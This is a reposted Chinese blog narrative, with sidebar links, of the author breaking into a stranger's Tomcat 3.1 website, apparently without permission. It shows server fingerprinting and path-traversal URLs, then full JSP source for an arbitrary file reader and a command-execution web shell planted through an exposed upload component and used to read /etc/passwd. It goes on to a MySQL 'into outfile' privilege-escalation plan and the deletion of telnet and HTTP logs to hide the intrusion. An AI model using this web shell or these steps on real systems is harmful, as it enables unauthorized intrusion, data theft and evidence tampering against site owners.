- 浏览: 971830 次
- 性别:
- 来自: 山西
文章分类
最新评论
-
白小默:
你好 可以提供下源码DEMO吗,不知为何,我导出来的excel ...
jxls 使用模板文件导出生成excel -
zkzqzzz:
博主威武!
让微信二维码扫描您的APK -
zkzqzzz:
感谢博主 原来那些类都不是必须的 或者自己写!!博主真棒 ...
抢红包插件实现原理浅析 -
zkzqzzz:
博主 请问你的其他类在哪里呢?
抢红包插件实现原理浅析 -
zkzqzzz:
其他类在哪呢?
抢红包插件实现原理浅析
很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于个人爱好,所以我决定看看系统的安全性。
telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]
返回的结果如下:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<h1>Error: 404</h1>
<h2>Location: /CHINANSL</h2>File Not Found<br>/CHINANSL
我获得了运行的WEBServer的名称"Tomcat 3.1"。我记得我曾经发现过这个版本的漏洞,并且post到bugtrap上去过。
大概是:通过".."技术可以退出WEB目录,于是:
http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.jsp%81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.jsp%2581 (不行)
http://target:8080/WEB-INF/ (不行)
嗯,在试试吧!Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context.试一下:http://target:8080/admin/
管理员果然没有删除或禁止访问这个目录:-(失误!!!!!
接着我点"VIEW ALL CONTEXT"按钮,列出了WEB目录下的一些文件和目录的名称,我开始仔细的看了起来,一小会儿,发现了一个上传文件的组件,嘿嘿,写一个jsp文件弄上去看看。
几口咖啡的时间,我写了这么一个东东出来:
<%@ page import="java.io.*" %>
<%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"<br>");
}
}catch(IOException e){}
%>
通过上传的组件将这个jsp上传到对方的WEB目录里,然后:
http://target:8080/upload/test.jsp?file=/etc/passwd
嘿嘿,密码出来啦。我只看了"/etc/passwd",并没有看"/etc/shadow",因为当时考虑webserver一般使用nobody的身份启动的,看了也白看。(失误)
接下来的过程是无聊的猜测密码,没有成功。算了,那我只有将就点,反正现在我相当于有了一个shell了嘛,猜不出密码上去,那就全当IE是我的SHELL环境吧!
再写:
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
然后把这个jsp又通过upload上传了上去,嘿嘿,我现在有个SHELL了。
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(我这里就不列出来了)
怎么获得root呢?经过一番搜索我发现了系统安装了mysql并且我从jsp的源代码中得到了mysql的密码:)看看是什么权限运行的mysql:
sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
显示:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
嘿嘿,有办法了,系统是以root身份运行的mysql,同时我知道了mysql的密码,那我现在我可以写一个shell程序,让它create一个表,然后将我的数据放到表中,然后再使用"select ... into outfile;"的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。(还记得apache.org有一次被入侵吗?hacker就采用的这种办法)。
然后,我再上传bindshell之类的程序,运行、获得nobody的权限,然后......再使用su root时帮忙创建的setuid shell让自己成为root.
嘿嘿,真是好办法,我都为我的想法感到得意......
接下去的事情,差点没让我吐血:
我敲了一个:http://target:8080/upload/cmd.jsp?cmd=id
显示:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
kao,我的这个WEB SHELL本来就是ROOT,真是服了那个管理员,也服了自己。竟然折腾了这么半天,哎!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份运行的(不列出来了)
剩下来的事情:
1、删除我的telnet记录。
2、删除http的日志。
至于清除日志嘛,我使用的办法是:cat xxx |grep -V "IP" >>temp然后在把temp覆盖那些被我修改过的日志文件。
我没有更换他的页面,因为我本身也就不是什么黑客啦,更不是红客,只是个网络安全爱好者而已。所以,发封邮件告诉system admin吧!
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/carefree31441/archive/2008/07/13/2645523.aspx
发表评论
-
java通过sftp JSch 上传文件下载文件查看文件目录,测试可用
2019-12-19 18:19 972基于maven ... -
服务器之间的 zip 文件定时传送
2019-12-19 10:28 5191、expect 安装 将expect和tcl的软 ... -
Java/web/jsp根据pdf模板生成荣誉证书PDF文件
2019-07-19 14:48 9551.前言 最近博主在 ... -
Java生成荣誉证书PDF文件
2019-07-19 13:08 1380Java生成荣誉证书PD ... -
百度云API刷脸
2019-07-13 11:41 631刷脸登录是基于人工智能、生物识别、3D传感、大数据风控技术, ... -
maven--maven配置多个源文件夹
2019-06-13 21:32 930需求 Maven 为我们提供了一致的项目目录配置(源文件 ... -
绿盟检测出“检测到目标URL存在http host头攻击漏洞”如何解决
2019-06-09 10:00 1001绿盟检测出“检测到目标URL存在http host头攻击漏 ... -
Linux安装apache及其简单的反向代理配置
2019-06-07 09:06 637Apache简介 Apache HTTP Se ... -
Linux二进制安装apache2.4.25
2019-06-07 09:06 714Linux二进制安装apache2.4. ... -
weblogic配置https,http自动跳转转https,ssl
2019-05-21 09:44 942最近,公司要求将http ... -
bootstrap-table组合表头
2019-03-06 10:04 913bootstrap-table组合表头 ... -
[Weblogic]如何清理缓存
2019-03-04 15:23 857[Weblogic]如何清理缓存 ... -
Guns第十节Swagger的讲解
2019-01-23 16:51 6412018年08月01日 15:54:30 ze ... -
Anaconda详细安装使用教程
2019-01-22 15:07 613关注微信公众号【Mi ... -
Windows系统下Eclipse上搭建Python开发环境
2019-01-22 15:00 327Windows系统下Eclipse上搭 ... -
Python 3.6 中使用pdfminer解析pdf文件
2019-01-22 14:50 935所使用python环境为最新 ... -
Python提取PDF内容(文本、图像、线条等)
2019-01-22 14:43 7544使用Python抽取PDF文件内 ... -
用python解析pdf中的文本与表格【pdfplumber的安装与使用】
2019-01-22 14:40 1533我们接触到的很多文档资料都是以pdf格式存在的,比如:论文, ... -
java实现PDF转HTML
2019-01-21 10:14 923java实现PDF转HTML 问题场景: ... -
JAVA PDFBOX 读取PDF表格
2019-01-18 17:39 2934最近在帮公司做工具,需要读取PDF中表格的数据。网上查了, ...
相关推荐
本文主要讲述了黑客通过MySQL进行网络入侵的全过程,涉及的知识点包括网络扫描、端口识别、Web服务器类型判断、数据库连接、安全漏洞利用以及文件路径探测等。以下是对这些知识点的详细解析: 1. **网络扫描**:...
【标题】:“注射入侵全攻略-文章及教程课件”这一标题揭示了主题内容主要围绕“注射入侵”这一网络安全威胁,结合文章和教程课件的形式,旨在深入解析和教导如何应对这种攻击方式。 【描述】:“注射入侵全攻略-...
7.3.2 全自动检测XSS 134 7.4 XSS高级利用 134 7.4.1 XSS会话劫持 135 7.4.2 XSS Framework 141 7.4.3 XSS GetShell 144 7.4.3 XSS蠕虫 149 7.5 修复XSS跨站漏洞 151 7.5.1 输入与输出 151 7.5.2 HttpOnly 158 7.6 ...
Snort是一款开源的网络入侵检测系统(NIDS),可在多种平台上运行,包括Linux和Windows。它能够实时分析网络流量,检测潜在的攻击行为。Snort作为一个轻量级的NIDS,主要功能是嗅探网络数据包,并根据预定义的规则集...
本文将深入探讨“视频监控系统全过程”,特别关注适用于手机、社区及互联网环境的系统,同时关注该系统采用C语言进行编程的事实。 一、系统概述 视频监控系统是一种集成了图像采集、信号传输、数据处理和存储等功能...
4. **攻击流程**:SQLmap可以完成从探测数据库结构到提取数据的全过程,如`--dbs`(列出所有数据库)、`--current-db`(显示当前数据库)、`--tables`(获取表名)、`--columns`(获取列名)等。 5. **数据抽取**:...
3. **识别攻击点**:开放的端口代表潜在的通信通道,同时也可能是攻击者入侵系统的入口,因此全连接扫描有助于识别可能的安全风险。 **全连接扫描的原理** 1. **建立连接**:Nmap发送一个SYN包,如果目标主机回应...
这种架构确保了从数据收集到结果展示的全过程高效、实时。 6. **适用场景与价值** 本项目不仅适用于学术研究,如毕业设计和课程设计,还能够应用于实际生产环境中,尤其对于大型互联网公司和金融机构,能够有效...
书中包含多个真实案例,展示了黑客攻击的全过程,帮助读者理解攻击者思维,并提供了模拟环境供读者实践攻击和防御技术。 六、法律与道德 强调黑客行为的法律界限,教育读者在学习黑客技术时应遵守道德规范,避免...
为了有效地防范SQL注入攻击,文章提出了一套从程序开发到应用部署的全过程安全策略。首先,在开发阶段,开发者需要加强数据库操作代码的安全性,避免直接将用户输入拼接到SQL语句中,而应使用参数化查询或者预处理...
【第八章 Web攻击及防御技术】 在当今互联网普及与Web技术快速发展的时代,Web安全面临着巨大的...综上所述,Web安全涉及多个层面,需要全方位的防御策略来保障用户的隐私和数据安全,同时确保服务的稳定性和可靠性。
设计原则包括预防为主、动态防御、集中管理、快速响应,旨在实现全方位的安全防护。 3. 技术防护 技术防护是保障Web网站安全的核心环节。 3.1. 架构安全 - 安全域划分:通过划分不同的安全区域,如互联网区、DMZ区...
【描述】这个本科毕业论文与毕业设计项目涵盖了系统分析、设计、开发和测试的全过程,旨在通过Java Web技术来构建一个功能完善的二维码门禁系统。系统主要功能包括用户管理、权限分配、二维码生成与验证、实时监控及...
同时,使用防火墙、入侵检测系统(IDS)和入侵防御系统(IPS)等技术来增强网络边界防护。 IV.02 WEB安全编码规范: 1. 区分公共区域和受限区域:明确划分用户的公共访问区域和需要认证授权的私有区域,确保敏感...
WEB安全测试是确保Web应用程序...总结来说,WEB安全测试是一个全方位的过程,涵盖了从环境配置、应用代码到用户交互的每个环节。通过细致的测试和有效的防范措施,可以大大提高Web应用程序的安全性,降低被攻击的风险。
本资料包提供了一个从发现SQL注入漏洞到下载整个网站源码的详细过程,以下是相关知识点的详解: 1. **SQL注入原理**:SQL注入是通过输入恶意SQL代码,欺骗服务器执行非预期的操作,通常发生在网站应用没有对用户...
这些步骤旨在建立一个基础的安全框架,降低系统被攻击的风险,同时也为Web服务器和FTP服务器提供了更高级别的保护,以抵御可能的入侵尝试。实验过程中,应仔细观察和分析每个步骤的效果,以确保系统的安全性得到最大...
基于TF-IDF和随机森林的Web攻击检测方法是现代安全架构的重要组成部分,它可以与防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等其他安全工具协同工作,形成多层次、全方位的防护网。此外,定期的安全测试和...
全连接扫描会完成整个TCP连接过程,扫描速度相对较慢,且更容易被防火墙或入侵检测系统识别。半连接扫描由于不建立完全连接,能更快地扫描大量目标,同时减少了被发现的可能性。 总结来说,掌握Nmap的半连接扫描...